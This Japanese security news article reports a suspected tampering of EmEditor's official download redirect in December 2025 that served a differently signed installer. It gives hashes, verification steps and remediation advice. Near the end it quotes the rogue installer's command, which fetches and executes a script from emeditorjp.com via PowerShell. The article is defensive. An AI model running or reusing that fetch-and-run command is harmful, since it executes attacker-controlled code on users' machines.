EmEditorの公式サイト「今すぐダウンロード」導線が改変-第三者のサイバー攻撃か

セキュリティニュース

投稿日時: 更新日時:

EmEditorの公式サイト「今すぐダウンロード」導線が改変-第三者のサイバー攻撃か

Emurasoft, Inc.は2025年12月23日、EmEditor公式サイトのダウンロード導線(ホームページ上の「今すぐダウンロード」ボタン)において、第三者による改変が疑われる事象を確認したと発表しました。該当期間中にこのボタンからダウンロードしたインストーラーが、Emurasoftが提供する正規ファイルではない可能性があるとして、利用者に確認を呼びかけています。

概要

影響が発生した可能性のある期間は、2025年12月20日 11:39 ~ 2025年12月23日 05:50(日本時間)です。この期間に「今すぐダウンロード」からインストーラーを入手した場合、通常の正規ファイルではなく、デジタル署名が異なる別ファイルがダウンロードされる状態だった可能性があります。なお、同社は「広めに見積もった期間」であり、実際はより短い可能性もあるとしています。

原因

本来、「今すぐダウンロード」ボタンのリンク先は、サポートサイト上のURLに向いており、リダイレクト(転送)設定で正規ファイル配布先へ誘導される設計です。しかし該当期間中、このリダイレクト設定が第三者により改変された疑いがあり、結果として本来とは異なるURLからファイルがダウンロードされる状態になっていたと説明しています。

問題のファイルは同社が作成したものではなく、すでに削除済みとされています。ダウンロードされた可能性のあるファイルには、Emurasoftの署名ではなく、「WALSHAM INVESTMENTS LIMITED」名義のデジタル署名が付与されていることを確認したとしています。

なお影響は日本語ページに限らず、他言語ページの同種URLも影響を受ける可能性があるとしています。

影響が確認されているファイル

現時点で影響が確認されているのは、次のファイルのみとされています。

正しいファイル(正規)

  • ファイル名:emed64_25.4.3.msi

  • サイズ:80,376,832 bytes

  • デジタル署名:Emurasoft, Inc.

  • SHA-256:e5f9c1e9b586b59712cefa834b67f829ccbed183c6855040e6d42f0c0c3fcb3e

問題のあるファイル(改ざんの可能性)

  • ファイル名:emed64_25.4.3.msi

  • サイズ:80,380,416 bytes

  • デジタル署名:WALSHAM INVESTMENTS LIMITED

同じファイル名でも、サイズと署名が異なる点が重要です。

影響を受けないケース

同社は、次のケースでは影響を受けないと明記しています。

  • EmEditorの更新チェッカー(Update Checker)または自動更新で更新した場合

  • download.emeditor.info から直接ダウンロードした場合

  • emed64_25.4.3.msi 以外のファイル

  • ポータブル版、ストアアプリ版

  • wingetでインストール/更新した場合

  • 問題のファイルをダウンロードしていても、実行していない場合

該当する可能性がある場合の確認方法

該当期間に「今すぐダウンロード」から入手した可能性がある場合、まずは デジタル署名SHA-256 を確認するよう案内されています。

デジタル署名の確認(Windows)

  1. emed64_25.4.3.msi を右クリック →「プロパティ」

  2. 「デジタル署名」タブで署名者を確認

  3. 署名者が Emurasoft, Inc. であることを確認

  4. WALSHAM INVESTMENTS LIMITED の場合は問題ファイルの可能性
    ※署名タブが表示されない場合も、署名がない・正しく認識できない可能性があるため、実行せず削除を検討するよう促しています。

SHA-256の確認(PowerShell)

  • PowerShellで次を実行
    Get-FileHash .\emed64_25.4.3.msi -Algorithm SHA256

  • 出力が正規のSHA-256
    e5f9c1e9b586b59712cefa834b67f829ccbed183c6855040e6d42f0c0c3fcb3e
    と一致するか確認します。

署名やハッシュが一致しない場合の推奨対応

同社は、署名が異なる、またはSHA-256が一致しない場合、改ざんファイル(マルウェアを含む可能性)を入手した恐れがあるとして、次を推奨しています。

  • 端末を直ちにネットワークから切り離す(有線/無線遮断)

  • 端末全体のマルウェアスキャンを実施する

  • 状況によりOSを含む環境のリフレッシュ/再構築も検討する

  • 端末で扱っていた情報の漏えい可能性も考慮し、パスワード変更(必要に応じて多要素認証の有効化)を検討する

  • 企業利用の場合はCSIRT等の社内セキュリティ部門へ連絡する

現時点で確認されている挙動

問題となる可能性のあるインストーラーは、実行時に次のコマンドを実行しようとするとされています。

  • powershell.exe "irm emeditorjp.com | iex"

このコマンドは、同社が管理していないドメイン(emeditorjp.com)から内容を取得して実行する動きであり、同社は危険として「絶対に実行しないでください」と明確に警告しています。

また、当該インストーラーはEmEditor本体のインストール自体は正常に進み、正規のEmEditorファイルがインストールされるため、問題に気付きにくい可能性があるとも説明しています。